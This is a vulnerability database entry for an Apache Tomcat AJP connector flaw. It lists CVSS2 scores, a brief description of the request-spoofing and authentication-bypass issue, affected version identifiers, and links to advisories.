CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
Confidence
High
EPSS
Percentile
85.4%
Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
Vendor | Product | Version | CPE |
---|---|---|---|
apache | tomcat | 7.0.0 | cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* |
apache | tomcat | 7.0.0 | cpe:2.3:a:apache:tomcat:7.0.0:beta:*:*:*:*:*:* |
apache | tomcat | 7.0.1 | cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:* |
apache | tomcat | 7.0.2 | cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:* |
apache | tomcat | 7.0.3 | cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:* |
apache | tomcat | 7.0.4 | cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:* |
apache | tomcat | 7.0.5 | cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:* |
apache | tomcat | 7.0.6 | cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:* |
apache | tomcat | 7.0.7 | cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:* |
apache | tomcat | 7.0.8 | cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:* |
marc.info/?l=bugtraq&m=132215163318824&w=2
marc.info/?l=bugtraq&m=133469267822771&w=2
marc.info/?l=bugtraq&m=136485229118404&w=2
marc.info/?l=bugtraq&m=139344343412337&w=2
secunia.com/advisories/45748
secunia.com/advisories/48308
secunia.com/advisories/49094
secunia.com/advisories/57126
securityreason.com/securityalert/8362
www.debian.org/security/2012/dsa-2401
www.mandriva.com/security/advisories?name=MDVSA-2011:156
www.securityfocus.com/archive/1/519466/100/0/threaded
www.securityfocus.com/bid/49353
www.securitytracker.com/id?1025993
exchange.xforce.ibmcloud.com/vulnerabilities/69472
issues.apache.org/bugzilla/show_bug.cgi?id=51698
lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e%40%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa%40%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf%40%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5%40%3Cdev.tomcat.apache.org%3E
oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14933
oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19465